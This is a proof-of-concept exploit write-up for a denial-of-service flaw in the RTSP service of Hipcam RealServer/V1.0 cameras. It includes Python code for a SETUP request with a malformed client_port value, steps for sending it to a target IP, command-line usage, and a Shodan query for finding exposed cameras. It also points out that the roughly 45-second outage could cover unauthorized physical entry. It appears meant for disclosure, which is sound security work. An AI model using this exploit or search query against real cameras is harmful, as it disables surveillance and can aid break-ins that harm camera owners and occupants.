Proof-of-Concept for RTSP Service Format Validation Vulnerability in Hipcam RealServer/V1.0.

This POC exploits a format validation vulnerability in the Real Time Streaming Protocol (RTSP) service of the Hipcam RealServer/V1.0, stemming from inadequate input validation and handling of the 'client_port' parameter in the RTSP SETUP request.

The 'client_port' parameter in the RTSP SETUP request is manipulated, inducing a vulnerability in the RTSP server's format validation. Unlike conventional exploits with a specific overflow value, this vulnerability is triggered by improper formatting, particularly when the 'client_port' is not in the expected format (e.g., client_port=[custom_port]-[custom_port+1]). Format validation vulnerabilities occur when an application fails to properly validate or handle input, potentially leading to unexpected behavior. In this case, the goal is to disrupt the service.

cam_address = "rtsp://120.75.111.XX:554/11" #The RTSP port is normaly 554 with the path /11 which is also normaly used in Hipcam Cameras
random_data_value = 8712429 #It can be anything except the correct format of [custom_port]-[custom_port+1]
rtsp_request = f"SETUP {cam_address}/trackID=1 RTSP/1.0\r\nCSeq: 3\r\nTransport: RTP/AVP;unicast;client_port={random_data_value}\r\n\r\n"

1. Formulate an RTSP URL for the target camera.
2. Craft an RTSP SETUP request with a manipulated 'client_port' parameter (ensure it is not in the expected format).
3. Establish a connection to the RTSP service on the target camera.
4. Send the crafted RTSP request to the camera, attempting to trigger the format validation vulnerability.

python3 poc.py 120.75.111.XX 554
python3 poc.py -h

Upon successful exploitation, the RTSP stream is offline for approximately 45 seconds. This disruption could be leveraged in physical attack scenarios where temporary unavailability of surveillance footage may provide an opportunity for unauthorized access or other malicious activities.

Timeline

Countries

For more information on the Shodan trend of Hipcam RealServer, check Shodan Trends.

Search query used: has_screenshot:true port:554 "Hipcam RealServer/V1.0".

This script is intended for educational and responsible disclosure purposes only. Unauthorized use of this script on systems without proper authorization is illegal and unethical. The user is responsible for ensuring compliance with legal and ethical standards.